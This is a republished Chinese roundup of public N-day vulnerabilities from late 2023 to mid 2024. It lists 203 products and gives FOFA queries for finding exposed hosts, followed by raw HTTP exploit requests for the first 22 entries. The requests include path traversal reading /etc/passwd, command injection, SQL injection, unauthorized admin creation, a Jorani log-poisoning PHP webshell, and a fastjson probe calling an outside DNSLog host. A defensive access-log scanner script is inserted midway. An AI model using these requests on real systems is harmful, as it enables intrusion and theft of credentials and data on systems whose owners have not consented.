Public Internet Vulnerability Roundup 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is republished from 网络安全新视界; author: 网络安全新视界
Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is meant to help defenders; defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 public, high-impact vulnerability PoCs disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed is already public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are shown with the word PAYLOAD in place of the payload; search for the full PoC yourself if you need it.

Legal notice: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete list; open your browser's search (F12) and look up a keyword to find an entry.
Bookmark this article if you find it useful, and consider following the public account (网络安全新视界).
Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR Smart Edge Gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 Active Safety Monitoring Cloud Platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS Smart Collaboration Platform api.aspx arbitrary file upload
11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
138. Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical imaging archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point Security Gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection (same issue as entry 158)
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
PoC list

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
Send this with a client that does not normalize the path (for example curl --path-as-is); browsers and most HTTP libraries collapse the ../ segments before the request leaves the machine.
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR Smart Edge Gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 hash of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 Active Safety Monitoring Cloud Platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then send the request below. The stok token in the path and the sysauth cookie come from that login; the injected command is the id appended to the wifiRebootrange field, and the two %s values are reproduced as published.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the statement below: encode it once, then encode the resulting % characters again, so the leading ' becomes %2527 and each space becomes %2520.

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

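The requests in entries 2, 5, 6, 7 and 9 all leave distinctive traces in a web server's access log, and the DocCMS payload shows why a single URL-decode pass is not enough when triaging them. The following script is an added example written for this roundup, not code from the original article or from any of the vendors listed. It parses constructed Common Log Format lines (the hosts, timestamps and sizes are made up; the request targets mirror the entries above), decodes each request target repeatedly until it stops changing, normalizes the path and every query value, and flags traversal or sensitive-file reads, shell-metacharacter command injection, and the SQL-injection functions used throughout this list (extractvalue, updatexml, waitfor delay, DBMS_PIPE, HASHBYTES, @@version). The marker lists are my own choice and are not exhaustive.

```python
"""Offline access-log triage for the request-based PoCs in this list.

Added example for this roundup, not code from the original article or any
vendor. Parses constructed Common Log Format lines, URL-decodes each request
target repeatedly (the DocCMS payload is double-encoded, so one pass misses
it), and flags file-read, command-injection and SQL-injection markers.
"""
from __future__ import annotations

import posixpath
import re
from urllib.parse import quote, unquote, urlsplit

# The DocCMS statement from entry 9, double URL-encoded the way the PoC needs it.
DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
DOUBLE_ENCODED = quote(quote(DOCCMS_PAYLOAD, safe=""), safe="")

# Constructed sample log lines: hosts, timestamps and sizes are made up; the
# request targets mirror entries 2, 3, 5, 6, 7 and 9 plus one benign request.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [05/Jun/2024:07:41:00 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1234',
    '10.0.0.5 - - [05/Jun/2024:07:41:01 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 200 800',
    '10.0.0.5 - - [05/Jun/2024:07:41:02 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 56',
    '10.0.0.5 - - [05/Jun/2024:07:41:03 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 2000',
    '10.0.0.5 - - [05/Jun/2024:07:41:04 +0800] "GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1" 200 300',
    f'10.0.0.5 - - [05/Jun/2024:07:41:05 +0800] "GET /search/index.php?keyword={DOUBLE_ENCODED} HTTP/1.1" 500 0',
    '10.0.0.7 - - [05/Jun/2024:07:41:06 +0800] "GET /index.html HTTP/1.1" 200 500',
])

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "win.ini", "web-inf", "jdbc.properties")
CMD_INJECTION_RE = re.compile(r"[;|&`]\s*(whoami|id|cat|ls|uname|ping|curl|wget)\b", re.I)
SQLI_RE = re.compile(
    r"(extractvalue\s*\(|updatexml\s*\(|waitfor\s+delay|dbms_pipe\.receive_message"
    r"|hashbytes\s*\(|@@version|'\s*(and|or)\s)",
    re.I,
)


def decode_fully(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """Percent-decode until the text stops changing; returns (text, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def looks_like_file_read(value: str) -> bool:
    """True for a '..' segment or for a normalized path that names a sensitive file."""
    unix_style = value.replace("\\", "/")
    if ".." in unix_style.split("/"):
        return True
    normalized = posixpath.normpath("/" + unix_style).lower()
    return any(marker in normalized for marker in SENSITIVE_FILES)


def split_query(query: str):
    """Yield raw (key, value) pairs without decoding, so decode rounds can be counted."""
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield key, value


def classify_target(target: str) -> list[dict]:
    """Return one finding per (category, evidence) for a single request target."""
    parts = urlsplit(target)
    findings = []
    path, rounds = decode_fully(parts.path)
    if looks_like_file_read(path):
        findings.append({"category": "file-read", "evidence": path, "decode_rounds": rounds})
    for key, raw_value in split_query(parts.query):
        value, rounds = decode_fully(raw_value)
        evidence = f"{key}={value}"
        if looks_like_file_read(value):
            findings.append({"category": "file-read", "evidence": evidence, "decode_rounds": rounds})
        if CMD_INJECTION_RE.search(value):
            findings.append({"category": "command-injection", "evidence": evidence, "decode_rounds": rounds})
        if SQLI_RE.search(value):
            findings.append({"category": "sql-injection", "evidence": evidence, "decode_rounds": rounds})
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return findings tagged with their line number."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for finding in classify_target(match.group("target")):
            results.append({"line": lineno, **finding})
    return results


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The decode_rounds value is worth keeping in a finding: a request that needed two decode passes to reveal extractvalue( is almost never legitimate traffic, whereas a single-encoded apostrophe can be. The Sangfor and 鸿运 requests carry no traversal at all, so the check normalizes the query value and matches on the file name rather than looking for "..".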
10. Landray (蓝凌) EIS Smart Collaboration Platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
The 1=@@version comparison forces a type-conversion error on SQL Server, so the database version string comes back in the error message.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests:
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter points at application/logs through ../, and the login value carries a PHP stub that passes the base64-decoded value of the K1SYJPMHLU4Z request header to system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;). The log file name carries the date on which step 2 was sent, so adjust log-2023-10-24 to the current date.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. This reaches the same getAllList handler as entry 14: the ;.ico suffix there and the a.ico/../ prefix here both make the request look like a static .ico resource to the authentication check, while the application still routes it to getAllList.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:1001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls HASHBYTES inside the sorts field to compute the MD5 of 1234; if the injection works, the hex digest 81dc9bdb52d04dc20036dbd8313ed055 shows up in the error response.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
The body is deliberately not well-formed JSON; the PoC relies on fastjson's lenient parser accepting it. The java.net.URL type makes the server resolve the host in val, so a DNS hit on your DNSLog domain confirms the fastjson sink. This request by itself does not execute code; that needs a gadget chain matching the target's classpath.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  ""}
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
Replace dnslog with your own DNSLog domain; a DNS query for it confirms that the log4j lookup fired.
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
